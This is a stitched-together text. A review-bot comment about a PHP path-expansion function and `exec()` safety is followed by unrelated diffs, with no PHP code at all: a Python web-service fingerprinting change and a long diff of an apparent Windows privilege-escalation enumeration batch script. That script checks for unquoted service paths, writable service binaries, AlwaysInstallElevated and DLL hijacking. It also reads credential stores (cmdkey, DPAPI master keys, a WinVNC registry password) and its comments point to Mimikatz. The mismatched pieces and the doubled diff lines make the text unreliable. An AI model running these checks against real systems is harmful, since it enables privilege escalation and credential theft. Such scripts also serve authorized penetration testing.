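Review bot: `expandPath` assumes both capture groups are present: for a path that is just `~` or `~user`, the optional second group does not participate, `$match[2]` is undefined, and `return $stdout[0] . $match[2];` raises a notice (a warning on PHP 8); likewise `$stdout[0]` is undefined when the shell produced no output. A guarded return such as `return (isset($stdout[0]) ? $stdout[0] : $match[1]) . (isset($match[2]) ? $match[2] : '');` covers both cases. The argument handed to `exec()` is only safe because the regex restricts group 1 to a tilde followed by `[a-zA-Z0-9_.-]`; that invariant deserves a comment on the `preg_match` line, e.g. `// group 1 is limited to ~ plus [a-zA-Z0-9_.-]; do not loosen this, it is what keeps the exec() argument inert`, so it is not relaxed later. `featureShell` continues past the end of the hunk.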

@ -8,6 +8,7 @@ import requests
import urllib.parse import urllib.parse
import util import util
from bs4 import BeautifulSoup from bs4 import BeautifulSoup
from crawl_urls import Crawler
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
@ -208,7 +209,7 @@ class WebServiceFinder:
litecart_pattern = re.compile(r"^https://www.litecart.net") litecart_pattern = re.compile(r"^https://www.litecart.net")
wordpress_pattern = re.compile(r"/wp-(admin|includes|content)/(([^/]+)/)*(wp-emoji-release.min.js|style.min.css)\?ver=([0-9.]+)(&|$)") wordpress_pattern = re.compile(r"/wp-(admin|includes|content)/(([^/]+)/)*(wp-emoji-release.min.js|style.min.css)\?ver=([0-9.]+)(&|$)")
urls = util.collectUrls(soup) urls = Crawler(self.url).collect_urls(soup)
for url in urls: for url in urls:
self.printMatch("Moodle", moodle_pattern_1.search(url), version_func=lambda v: self.retrieveMoodleVersion(int(v))) self.printMatch("Moodle", moodle_pattern_1.search(url), version_func=lambda v: self.retrieveMoodleVersion(int(v)))
self.printMatch("Moodle", moodle_pattern_2.search(url), version_func=lambda v: "%d.%d" % (int(v)//10,int(v)%10)) self.printMatch("Moodle", moodle_pattern_2.search(url), version_func=lambda v: "%d.%d" % (int(v)//10,int(v)%10))



@ -55,7 +55,7 @@ ECHO.
CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO
CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS" CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS"
ECHO. [i] Check for vulnerabilities for the OS version with the applied patches ECHO. [i] Check for vulnerabilities for the OS version with the applied patches
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
systeminfo systeminfo
ECHO. ECHO.
CALL :T_Progress 2 CALL :T_Progress 2
@ -174,7 +174,7 @@ CALL :T_Progress 1
:UACSettings :UACSettings
CALL :ColorLine " %E%33m[+]%E%97m UAC Settings" CALL :ColorLine " %E%33m[+]%E%97m UAC Settings"
ECHO. [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on ECHO. [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA 2>nul REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA 2>nul
ECHO. ECHO.
CALL :T_Progress 1 CALL :T_Progress 1
@ -225,7 +225,7 @@ CALL :T_Progress 1
:InstalledSoftware :InstalledSoftware
CALL :ColorLine " %E%33m[+]%E%97m INSTALLED SOFTWARE" CALL :ColorLine " %E%33m[+]%E%97m INSTALLED SOFTWARE"
ECHO. [i] Some weird software? Check for vulnerabilities in unknow software installed ECHO. [i] Some weird software? Check for vulnerabilities in unknow software installed
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#software
ECHO. ECHO.
dir /b "C:\Program Files" "C:\Program Files (x86)" | sort dir /b "C:\Program Files" "C:\Program Files (x86)" | sort
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\" reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\"
@ -236,7 +236,7 @@ CALL :T_Progress 2
:RemodeDeskCredMgr :RemodeDeskCredMgr
CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager" CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager"
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#remote-desktop-credential-manager
IF exist "%LOCALAPPDATA%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files IF exist "%LOCALAPPDATA%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files
ECHO. ECHO.
CALL :T_Progress 1 CALL :T_Progress 1
@ -244,7 +244,7 @@ CALL :T_Progress 1
:WSUS :WSUS
CALL :ColorLine " %E%33m[+]%E%97m WSUS" CALL :ColorLine " %E%33m[+]%E%97m WSUS"
ECHO. [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit) ECHO. [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit)
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\ 2>nul | findstr /i "wuserver" | findstr /i "http://" reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\ 2>nul | findstr /i "wuserver" | findstr /i "http://"
ECHO. ECHO.
CALL :T_Progress 1 CALL :T_Progress 1
@ -252,7 +252,7 @@ CALL :T_Progress 1
:RunningProcesses :RunningProcesses
CALL :ColorLine " %E%33m[+]%E%97m RUNNING PROCESSES" CALL :ColorLine " %E%33m[+]%E%97m RUNNING PROCESSES"
ECHO. [i] Something unexpected is running? Check for vulnerabilities ECHO. [i] Something unexpected is running? Check for vulnerabilities
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#running-processes
tasklist /SVC tasklist /SVC
ECHO. ECHO.
CALL :T_Progress 2 CALL :T_Progress 2
@ -273,7 +273,7 @@ CALL :T_Progress 3
:RunAtStartup :RunAtStartup
CALL :ColorLine " %E%33m[+]%E%97m RUN AT STARTUP" CALL :ColorLine " %E%33m[+]%E%97m RUN AT STARTUP"
ECHO. [i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary ECHO. [i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#run-at-startup
::(autorunsc.exe -m -nobanner -a * -ct /accepteula 2>nul || wmic startup get caption,command 2>nul | more & ^ ::(autorunsc.exe -m -nobanner -a * -ct /accepteula 2>nul || wmic startup get caption,command 2>nul | more & ^
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^ reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^ reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^
@ -297,7 +297,7 @@ CALL :T_Progress 2
:AlwaysInstallElevated :AlwaysInstallElevated
CALL :ColorLine " %E%33m[+]%E%97m AlwaysInstallElevated?" CALL :ColorLine " %E%33m[+]%E%97m AlwaysInstallElevated?"
ECHO. [i] If '1' then you can install a .msi file with admin privileges ;) ECHO. [i] If '1' then you can install a .msi file with admin privileges ;)
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul
ECHO. ECHO.
@ -361,7 +361,7 @@ CALL :T_Progress 1
:BasicUserInfo :BasicUserInfo
CALL :ColorLine "%E%32m[*]%E%97m BASIC USER INFO CALL :ColorLine "%E%32m[*]%E%97m BASIC USER INFO
ECHO. [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege ECHO. [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#users-and-groups
ECHO. ECHO.
CALL :ColorLine " %E%33m[+]%E%97m CURRENT USER" CALL :ColorLine " %E%33m[+]%E%97m CURRENT USER"
net user %username% net user %username%
@ -435,7 +435,7 @@ ECHO.
:ServiceBinaryPermissions :ServiceBinaryPermissions
CALL :ColorLine " %E%33m[+]%E%97m SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS" CALL :ColorLine " %E%33m[+]%E%97m SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS"
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
for /f "tokens=2 delims='='" %%a in ('cmd.exe /c wmic service list full ^| findstr /i "pathname" ^|findstr /i /v "system32"') do ( for /f "tokens=2 delims='='" %%a in ('cmd.exe /c wmic service list full ^| findstr /i "pathname" ^|findstr /i /v "system32"') do (
for /f eol^=^"^ delims^=^" %%b in ("%%a") do icacls "%%b" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && ECHO. for /f eol^=^"^ delims^=^" %%b in ("%%a") do icacls "%%b" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && ECHO.
) )
@ -444,7 +444,7 @@ CALL :T_Progress 1
:CheckRegistryModificationAbilities :CheckRegistryModificationAbilities
CALL :ColorLine " %E%33m[+]%E%97m CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY" CALL :ColorLine " %E%33m[+]%E%97m CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY"
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
for /f %%a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv >nul 2>&1 & reg save %%a %temp%\reg.hiv >nul 2>&1 && reg restore %%a %temp%\reg.hiv >nul 2>&1 && ECHO.You can modify %%a for /f %%a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv >nul 2>&1 & reg save %%a %temp%\reg.hiv >nul 2>&1 && reg restore %%a %temp%\reg.hiv >nul 2>&1 && ECHO.You can modify %%a
ECHO. ECHO.
CALL :T_Progress 1 CALL :T_Progress 1
@ -453,7 +453,7 @@ CALL :T_Progress 1
CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS" CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS"
ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe' ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
ECHO. [i] The permissions are also checked and filtered using icacls ECHO. [i] The permissions are also checked and filtered using icacls
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do ( for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do ( for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
ECHO.%%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (ECHO.%%n && ECHO.%%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && ECHO. ECHO.%%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (ECHO.%%n && ECHO.%%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && ECHO.
@ -468,7 +468,7 @@ ECHO.
CALL :ColorLine "%E%32m[*]%E%97m DLL HIJACKING in PATHenv variable" CALL :ColorLine "%E%32m[*]%E%97m DLL HIJACKING in PATHenv variable"
ECHO. [i] Maybe you can take advantage of modifying/creating some binary in some of the following locations ECHO. [i] Maybe you can take advantage of modifying/creating some binary in some of the following locations
ECHO. [i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate ECHO. [i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dll-hijacking
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. ) for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. )
ECHO. ECHO.
CALL :T_Progress 1 CALL :T_Progress 1
@ -477,7 +477,7 @@ CALL :T_Progress 1
CALL :ColorLine "%E%32m[*]%E%97m CREDENTIALS" CALL :ColorLine "%E%32m[*]%E%97m CREDENTIALS"
ECHO. ECHO.
CALL :ColorLine " %E%33m[+]%E%97m WINDOWS VAULT" CALL :ColorLine " %E%33m[+]%E%97m WINDOWS VAULT"
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#windows-vault
cmdkey /list cmdkey /list
ECHO. ECHO.
CALL :T_Progress 2 CALL :T_Progress 2
@ -485,14 +485,14 @@ CALL :T_Progress 2
:DPAPIMasterKeys :DPAPIMasterKeys
CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS" CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS"
ECHO. [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt ECHO. [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
powershell -command "Get-ChildItem %appdata%\Microsoft\Protect" 2>nul powershell -command "Get-ChildItem %appdata%\Microsoft\Protect" 2>nul
powershell -command "Get-ChildItem %localappdata%\Microsoft\Protect" 2>nul powershell -command "Get-ChildItem %localappdata%\Microsoft\Protect" 2>nul
CALL :T_Progress 2 CALL :T_Progress 2
CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS" CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS"
ECHO. [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt ECHO. [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt
ECHO. [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module ECHO. [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
ECHO. ECHO.
ECHO.Looking inside %appdata%\Microsoft\Credentials\ ECHO.Looking inside %appdata%\Microsoft\Credentials\
ECHO. ECHO.
@ -565,7 +565,7 @@ CALL :T_Progress 2
:AppCMD :AppCMD
CALL :ColorLine " %E%33m[+]%E%97m AppCmd" CALL :ColorLine " %E%33m[+]%E%97m AppCmd"
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd-exe
IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists. IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists.
ECHO. ECHO.
CALL :T_Progress 2 CALL :T_Progress 2
@ -573,7 +573,7 @@ CALL :T_Progress 2
:RegFilesCredentials :RegFilesCredentials
CALL :ColorLine " %E%33m[+]%E%97m Files in registry that may contain credentials" CALL :ColorLine " %E%33m[+]%E%97m Files in registry that may contain credentials"
ECHO. [i] Searching specific files that may contains credentials. ECHO. [i] Searching specific files that may contains credentials.
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
ECHO.Looking inside HKCU\Software\ORL\WinVNC3\Password ECHO.Looking inside HKCU\Software\ORL\WinVNC3\Password
reg query HKCU\Software\ORL\WinVNC3\Password 2>nul reg query HKCU\Software\ORL\WinVNC3\Password 2>nul
CALL :T_Progress 2 CALL :T_Progress 2

Binary file not shown.

Binary file not shown.